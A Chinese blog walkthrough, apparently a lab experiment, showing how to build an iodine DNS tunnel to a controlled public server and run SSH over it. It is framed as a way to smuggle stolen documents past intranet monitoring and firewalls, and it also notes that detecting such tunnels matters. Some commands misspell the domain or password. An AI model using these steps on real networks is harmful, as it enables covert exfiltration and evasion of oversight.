黑客成功入侵一台内网服务器之后,获取了企业密级文档,为了躲避内网日志监控系统,为了穿透内网的防火墙策略,选择一种秘密传输的加密隧道。
以下是我的实验:通过9步操作,成功的通过dns加密隧道建立了ssh加密连接。检测dns隧道是当前态势感知系统必不可少的功能模块。
第一步:添加一条NS记录
我这里的设置是dns.hackbiji.top指向dnsns.hackbiji.top,想要解析dns.hackbiji.top这个子域名,就需要去访问dnsns.hackbiji.top这个域名服务器
第二步:添加一条A记录
将域名服务器解析到咱们的控制的公网服务器IP地址,我的域名服务器是dnsns.hackbiji.top,对应的公网IP地址是96.45.188.252
第三步:通过iodine建立DNS隧道
-f前台显示-P设置通信密码(我的密码是hackbijipasswd)10.0.0.1(我设置的服务器私有网址,也可以设置为其他地址)dnsns.hackbiji.top(我的域名,也可以设置为dns.hackbiji.top)
iodined -fP hackbijipasswd 10.0.0.1 dnsns.hackbji.top
或
iodined -fP hackbijipasswd 10.0.0.1 dns.hackbji.top
第四步:查看服务器IP地址
- 多了一个
dns0接口,IP地址是咱们设置的10.0.0.1
第五步:本地客户端连接服务器
-fP hackbijipasswd前台显示,并设置密码(hackbijipasswd)96.45.188.252我的服务器IP地址dnsns.hackbiji.top我的域名(必须和服务器设置的域名保持一致)
iodine -fP hackbjipasswd 96.45.188.252 dnsns.hackbiji.top
或
iodine -fP hackbjipasswd 96.45.188.252 dns.hackbiji.top
第六步:查看本地客户端IP地址
- 多了一个
dns0接口,并且IP地址是自动生成和服务器一个网段的10.0.0.2
第七步:从本地Ping通服务器10.0.0.1
- 这时我们的DNS隧道建立成功了
第八步:查看本地路由
- 访问
10.0.0.0网段的流量都会走dns0隧道接口
第九步:从本地dns0隧道登陆远程服务器
ssh穿越dns0隧道,成功登陆远程服务器
最后,DNS隧道抓包:
root@ubuntu:~# cat /etc/resolv.conf
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
nameserver 1.0.0.1
nameserver 8.8.8.8
nameserver 1.1.1.1
服务端dns0接口数据:
服务端eth0接口数据:
DNS请求和应答,都是通过eth0接口收发包的。
如果发生在内网,你无法访问外网IP(96.45.188.252)的时候,可以去掉IP地址,直接通过内网的DNS服务器帮你请求,依然能达到建立隧道的效果。
iodine -fP hackbjipasswd dnsns.hackbiji.top
4663
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
